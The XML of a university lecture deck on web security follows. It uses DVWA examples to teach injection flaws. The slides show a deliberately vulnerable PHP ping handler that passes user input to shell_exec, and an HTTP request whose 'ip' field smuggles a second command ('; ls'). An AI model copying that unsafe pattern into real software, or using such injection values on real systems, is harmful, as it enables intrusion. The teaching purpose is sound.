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0"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId51"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="289" r:id="rId2"/>
    <p:sldId id="546" r:id="rId3"/>
    <p:sldId id="545" r:id="rId4"/>
    <p:sldId id="544" r:id="rId5"/>
    <p:sldId id="547" r:id="rId6"/>
    <p:sldId id="548" r:id="rId7"/>
    <p:sldId id="549" r:id="rId8"/>
    <p:sldId id="550" r:id="rId9"/>
    <p:sldId id="407" r:id="rId10"/>
    <p:sldId id="551" r:id="rId11"/>
    <p:sldId id="433" r:id="rId12"/>
    <p:sldId id="434" r:id="rId13"/>
    <p:sldId id="437" r:id="rId14"/>
    <p:sldId id="438" r:id="rId15"/>
    <p:sldId id="474" r:id="rId16"/>
    <p:sldId id="552" r:id="rId17"/>
    <p:sldId id="554" r:id="rId18"/>
    <p:sldId id="458" r:id="rId19"/>
    <p:sldId id="443" r:id="rId20"/>
    <p:sldId id="444" r:id="rId21"/>
    <p:sldId id="442" r:id="rId22"/>
    <p:sldId id="445" r:id="rId23"/>
    <p:sldId id="446" r:id="rId24"/>
    <p:sldId id="448" r:id="rId25"/>
    <p:sldId id="453" r:id="rId26"/>
    <p:sldId id="454" r:id="rId27"/>
    <p:sldId id="455" r:id="rId28"/>
    <p:sldId id="452" r:id="rId29"/>
    <p:sldId id="461" r:id="rId30"/>
    <p:sldId id="460" r:id="rId31"/>
    <p:sldId id="537" r:id="rId32"/>
    <p:sldId id="525" r:id="rId33"/>
    <p:sldId id="526" r:id="rId34"/>
    <p:sldId id="528" r:id="rId35"/>
    <p:sldId id="529" r:id="rId36"/>
    <p:sldId id="464" r:id="rId37"/>
    <p:sldId id="531" r:id="rId38"/>
    <p:sldId id="555" r:id="rId39"/>
    <p:sldId id="540" r:id="rId40"/>
    <p:sldId id="556" r:id="rId41"/>
    <p:sldId id="557" r:id="rId42"/>
    <p:sldId id="543" r:id="rId43"/>
    <p:sldId id="470" r:id="rId44"/>
    <p:sldId id="408" r:id="rId45"/>
    <p:sldId id="485" r:id="rId46"/>
    <p:sldId id="487" r:id="rId47"/>
    <p:sldId id="493" r:id="rId48"/>
    <p:sldId id="471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orient="horz" pos="1440">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" pos="3840">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" pos="19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verick Woo" initials="ma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FF"/>
    <a:srgbClr val="717BFF"/>
    <a:srgbClr val="3F5842"/>
    <a:srgbClr val="595A5A"/>
    <a:srgbClr val="A32D1E"/>
    <a:srgbClr val="FFFFFF"/>
    <a:srgbClr val="866C49"/>
    <a:srgbClr val="79463D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3" autoAdjust="0"/>
    <p:restoredTop sz="86098" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="68" d="100"/>
          <a:sy n="68" d="100"/>
        </p:scale>
        <p:origin x="2050" y="67"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2880"/>
        <p:guide orient="horz" pos="1440"/>
        <p:guide pos="384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59" d="100"/>
        <a:sy n="59" d="100"/>
      </p:scale>
      <p:origin x="0" y="-40027"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="110" d="100"/>
          <a:sy n="110" d="100"/>
        </p:scale>
        <p:origin x="-404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81C90-955A-E944-AB32-466E55900D6A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8D97-067E-974E-BD5D-FA8C0988A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919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EA11A-7C1A-F544-A99B-661F38A45889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5A8A3-9FBB-431D-AAA8-BEEA360F5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664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13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62B3FC-2135-4E26-9C94-50F8F163901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04" y="4342789"/>
            <a:ext cx="5485794" cy="4115106"/>
          </a:xfrm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86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03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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> from Web Application Hacker’s Handbook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982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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> from Web Application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0"/>
              <a:t>Hacker’s Handbook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35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49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84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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-This is the closest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> to our threat model when we discussed Control Flow Hijacking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16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10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7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67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="http://thenounproject.com/noun/evil/#icon-No14759" target="_blank"&gt;Evil&lt;/a&gt;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acondiff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" target="_blank"&gt;Austin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Condiff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="http://thenounproject.com/noun/happy/#icon-No3060" target="_blank"&gt;Happy&lt;/a&gt;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tobiasfabian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" target="_blank"&gt;Tobias F. Wolf&lt;/a&gt; from The Noun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03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16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="http://thenounproject.com/noun/database/#icon-No15201" target="_blank"&gt;Database&lt;/a&gt;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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ceesdevries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" target="_blank"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Cees</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Vries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/a&gt; from The Noun Project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="http://thenounproject.com/noun/user/#icon-No2727" target="_blank"&gt;User&lt;/a&gt; designed by &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="http://thenounproject.com/Luis" target="_blank"&gt;Luis Prado&lt;/a&gt; from The Noun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5A8A3-9FBB-431D-AAA8-BEEA360F570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6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5.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag6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i="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Calibri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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt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A2AE38F-F663-7942-B079-5005BA0BDF98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89C206F0-989F-EB47-9ADF-69E14BBCA2C4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5B7867C-8937-A54F-BAEE-445098FFEF8A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15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E2076C5-CD0F-8E46-ABC4-9EABE219C92B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4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A5379D80-A8B0-C443-BFE8-6E9F37773209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1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3034508"/>
            <a:ext cx="6951274" cy="1308892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92724" y="1524000"/>
            <a:ext cx="6951274" cy="1500187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" anchor="b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B6757E5B-C539-4546-894F-EB0786D60B50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264380" y="2013343"/>
            <a:ext cx="6951274" cy="753670"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4000" b="0" i="0" cap="none">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Section Header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64380" y="2919413"/>
            <a:ext cx="6951274" cy="1500187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"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FF059461-0FFD-CF49-A98A-09B0AEA4D5FF}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21-Dec-23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9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447800"/>
            <a:ext cx="4038600" cy="4678363"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr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1981200"/>
            <a:ext cx="4040188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1981200"/>
            <a:ext cx="4041775" cy="4144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21557A61-675D-5A4C-8099-956071C6A9AA}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21-Dec-23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FC88AAD4-BEBB-AE48-AF6A-5D0E05A49B41}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21-Dec-23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7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41EE10F8-3DB7-9B44-B7CC-65AF664A5F6D}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21-Dec-23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>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4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2D1B10-278B-5146-B66A-B6028DFB770B}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21-Dec-23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0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76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fld id="{A271CCEE-A76B-F34C-A05F-2F1994D60204}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>21-Dec-23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5"/>
                </a:solidFill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934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fld id="{B747839D-A323-47F3-909F-5484993996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0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 spc="-50" normalizeH="0">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="Cambria"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="292100" indent="-2921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635000" indent="-2921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9144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1143000" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial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320800" indent="-1778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emf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emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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2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98423" y="2035175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b="1" dirty="0"/>
              <a:t>Web Security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3733800"/>
            <a:ext cx="3159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Jonathan Burket</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Carnegie Mellon University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4083" y="5380672"/>
            <a:ext cx="67312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Credits: Original Slides by David Brumley.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examples based on DVWA (http://www.dvwa.co.uk/)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Collin Jackson’s Web Security Course</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> http://caffeinept.blogspot.com/2012/01/dvwa-sql-injection.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Graphics from The Noun Project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2453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u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injection flaws </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>occur when an application sends untrusted data to an interpreter.” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>--- OWASP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6492875"/>
            <a:ext cx="7021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https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>www.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/Top_10_2010-A4-Insecure_Direct_Object_References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066800" y="2811572"/>
            <a:ext cx="6779172" cy="2979627"/>
            <a:chOff x="1066800" y="2811572"/>
            <a:chExt cx="6779172" cy="2979627"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Bent-Up Arrow 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1066800" y="2811572"/>
              <a:ext cx="2133600" cy="2133600"/>
            </a:xfrm>
            <a:prstGeom prst="bentUpArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 19581"/>
                <a:gd name="adj2" fmla="val 25000"/>
                <a:gd name="adj3" fmla="val 25000"/>
              </a:avLst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969172" y="3581400"/>
              <a:ext cx="4876800" cy="2209799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Like Buffer Overflow and Format String Vulnerabilities, A result of from </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>mixing data and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223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11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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11" descr="Screen Shot 2012-07-02 at 11.42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717" y="2743947"/>
            <a:ext cx="4051300" cy="1397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14400" y="533400"/>
            <a:ext cx="3403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dirty="0"/>
              <a:t>1. http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>site.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>/exec/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52400" y="4293275"/>
            <a:ext cx="66575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&lt;h2&gt;Ping for FREE&lt;/h2&gt;</a:t>
            </a:r>
          </a:p>
          <a:p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&lt;p&gt;Enter an IP address below:&lt;/p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;form name="ping" action="#" method="post"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;input type="text" name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>" size="30"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;input type="submit" value="submit" name="submit”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/form&gt;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6477000" y="4792720"/>
            <a:ext cx="2438400" cy="930160"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -72917"/>
              <a:gd name="adj2" fmla="val 24373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Input to form program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14600" y="5410200"/>
            <a:ext cx="1371600" cy="312680"/>
          </a:xfrm>
          <a:prstGeom prst="round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924800" y="1939620"/>
            <a:ext cx="651999" cy="65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86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12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5" idx="3"/>
            <a:endCxn id="10" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="3954379" y="220579"/>
            <a:ext cx="685800" cy="43594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23908" y="2370782"/>
            <a:ext cx="1780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Send output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4293275"/>
            <a:ext cx="66575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&lt;h2&gt;Ping for FREE&lt;/h2&gt;</a:t>
            </a:r>
          </a:p>
          <a:p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&lt;p&gt;Enter an IP address below:&lt;/p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;form name="ping" action="#" method="post"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;input type="text" name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>" size="30"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;input type="submit" value="submit" name="submit”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/form&gt;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14600" y="5410200"/>
            <a:ext cx="1371600" cy="312680"/>
          </a:xfrm>
          <a:prstGeom prst="round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Snip Single Corner Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4343400" y="2743200"/>
            <a:ext cx="4267200" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="snip1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en-US" dirty="0"/>
              <a:t>  …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $t = $_REQUEST[‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>']; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $o = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shell_exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(‘ping –C 3’ . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>$t)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/>
              <a:t> echo $o</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  …</a:t>
            </a:r>
          </a:p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5940" y="4256393"/>
            <a:ext cx="2142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PHP exec program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=127.0.0.1&amp;submit=submit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6380020" y="533400"/>
            <a:ext cx="1676400" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -184366"/>
              <a:gd name="adj2" fmla="val 4507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ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858000" y="2057400"/>
            <a:ext cx="635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268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13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=127.0.0.1&amp;submit=submit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6380020" y="533400"/>
            <a:ext cx="1676400" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -184366"/>
              <a:gd name="adj2" fmla="val 4507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ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2012-07-02 at 11.54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4600"/>
            <a:ext cx="6896100" cy="30734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343400" y="2743200"/>
            <a:ext cx="4267200" cy="1882525"/>
            <a:chOff x="4343400" y="2743200"/>
            <a:chExt cx="4267200" cy="1882525"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Snip Single Corner Rectangle 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4343400" y="2743200"/>
              <a:ext cx="4267200" cy="1476375"/>
            </a:xfrm>
            <a:prstGeom prst="snip1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r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>  $t = $_REQUEST[‘</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1"/>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>']; </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t> $o = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1"/>
                <a:t>shell_exec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>(‘ping –C 3’ . $t);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t> echo $o</a:t>
              </a:r>
            </a:p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05940" y="4256393"/>
              <a:ext cx="21421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PHP exec program</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rounded Rectangular Callout 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1355558" y="3124200"/>
            <a:ext cx="1981200" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 110217"/>
              <a:gd name="adj2" fmla="val -12460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spot the bug</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="137437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14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638800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Server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8358" y="1447800"/>
            <a:ext cx="2438400" cy="609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Client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Elbow Connector 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4487779" y="-992271"/>
            <a:ext cx="12700" cy="4740442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123908" y="2133600"/>
            <a:ext cx="4740442" cy="698847"/>
            <a:chOff x="2123908" y="2965450"/>
            <a:chExt cx="4740442" cy="698847"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="17" name="Elbow Connector 16"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="4487779" y="601579"/>
              <a:ext cx="12700" cy="4740442"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 180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23908" y="3202632"/>
              <a:ext cx="1822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2. Send page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10095" y="0"/>
            <a:ext cx="4653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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/vulnerabilities/exec/ HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host: 172.16.59.128</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=127.0.0.1%3b+ls&amp;submit=submit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943600" y="381000"/>
            <a:ext cx="2438400" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -90686"/>
              <a:gd name="adj2" fmla="val 69036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“; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” encoded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838200"/>
            <a:ext cx="762000" cy="362129"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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2662518"/>
            <a:ext cx="6756400" cy="3966881"/>
            <a:chOff x="0" y="2662518"/>
            <a:chExt cx="6756400" cy="3966881"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 10" descr="Screen Shot 2012-07-02 at 11.58.34 A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662518"/>
              <a:ext cx="6756400" cy="3759200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Rounded Rectangular Callout 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2815140" y="5667464"/>
              <a:ext cx="2823660" cy="961935"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -94651"/>
                <a:gd name="adj2" fmla="val -27136"/>
                <a:gd name="adj3" fmla="val 16667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Information</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Disclosure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9882" y="5486400"/>
              <a:ext cx="1494118" cy="714465"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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343400" y="2743200"/>
            <a:ext cx="4267200" cy="1882525"/>
            <a:chOff x="4343400" y="2743200"/>
            <a:chExt cx="4267200" cy="1882525"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="TextBox 21"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5405940" y="4256393"/>
              <a:ext cx="214212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PHP exec program</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
